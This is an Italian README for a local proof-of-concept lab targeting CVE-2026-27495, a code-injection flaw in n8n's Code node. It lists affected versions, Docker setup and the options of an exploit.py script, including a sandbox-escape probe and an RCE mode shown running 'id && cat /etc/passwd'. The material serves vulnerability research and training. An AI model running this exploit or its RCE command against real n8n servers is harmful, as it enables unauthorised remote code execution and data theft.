
Ambiente di laboratorio ed exploit proof-of-concept per CVE-2026-27495
| CVE | CVE-2026-27495 |
| CVSS | 9.4 (Critical) |
| CWE | CWE-94 — Code Injection |
| Affected | n8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0 |
| Fixed | 1.123.22 / 2.9.3 / 2.10.1 |
| Attack Surface | Nodo Code (autenticato, Task Runners abilitati) |
docker compose up -d
Attendi circa 15 secondi per l'avvio di n8n, poi apri http://localhost:5678 e crea un account proprietario (email: [email protected], password: TestPassword123!).
pip install requests
Sonda evasione del sandbox :
python3 exploit.py --probe
RCE — decommenta NODE_FUNCTION_ALLOW_BUILTIN=* nel docker-compose.yml, poi riavvia:
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"
Configurazione iniziale (crea automaticamente l'account proprietario):
python3 exploit.py --setup --probe
Options:
--url URL URL base di n8n (default: http://localhost:5678)
--email EMAIL Email di login (default: [email protected])
--password PASSWORD Password di login
--cmd CMD Comando del sistema operativo da eseguire (RCE)
--setup Crea account proprietario (istanza nuova)
--probe Sonda solo l'evasione del sandbox (nessun RCE, funziona con qualsiasi configurazione)
--proxy PROXY Proxy HTTP (es. http://127.0.0.1:8080)
Esclusivamente per scopi autorizzati di ricerca sulla sicurezza e formazione.